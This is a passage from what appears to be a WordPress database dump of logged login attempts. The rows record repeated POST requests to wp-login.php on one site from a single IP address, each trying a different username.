bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"115\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"115\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746827505.6568639;s:12:\"REQUEST_TIME\";i:1746827505;}}','13.201.84.118',1,'2025-05-10 03:21:47','2025-05-11 04:14:47'),(95116,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746827505.6575811;s:12:\"REQUEST_TIME\";i:1746827505;}}','13.201.84.118',1,'2025-05-10 03:21:47','2025-05-11 04:14:47'),(95117,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746827505.656111;s:12:\"REQUEST_TIME\";i:1746827505;}}','13.201.84.118',1,'2025-05-10 03:21:47','2025-05-11 04:14:47'),(95118,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746827505.654882;s:12:\"REQUEST_TIME\";i:1746827505;}}','13.201.84.118',1,'2025-05-10 03:21:47','2025-05-11 04:14:48'),(95119,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746827505.6537199;s:12:\"REQUEST_TIME\";i:1746827505;}}','13.201.84.118',1,'2025-05-10 03:21:47','2025-05-11 04:14:48'),(95120,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746827760.2331381;s:12:\"REQUEST_TIME\";i:1746827760;}}','13.201.84.118',1,'2025-05-10 03:26:01','2025-05-11 04:14:48'),(95121,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746827760.2337799;s:12:\"REQUEST_TIME\";i:1746827760;}}','13.201.84.118',1,'2025-05-10 03:26:01','2025-05-11 04:14:47'),(95122,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746827760.2345021;s:12:\"REQUEST_TIME\";i:1746827760;}}','13.201.84.118',1,'2025-05-10 03:26:01','2025-05-11 04:14:47'),(95123,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746827760.3117449;s:12:\"REQUEST_TIME\";i:1746827760;}}','13.201.84.118',1,'2025-05-10 03:26:01','2025-05-11 04:14:48'),(95124,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"117\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"117\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746827760.2179141;s:12:\"REQUEST_TIME\";i:1746827760;}}','13.201.84.118',1,'2025-05-10 03:26:02','2025-05-11 04:14:47'),(95125,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746828017.084096;s:12:\"REQUEST_TIME\";i:1746828017;}}','13.201.84.118',1,'2025-05-10 03:30:18','2025-05-11 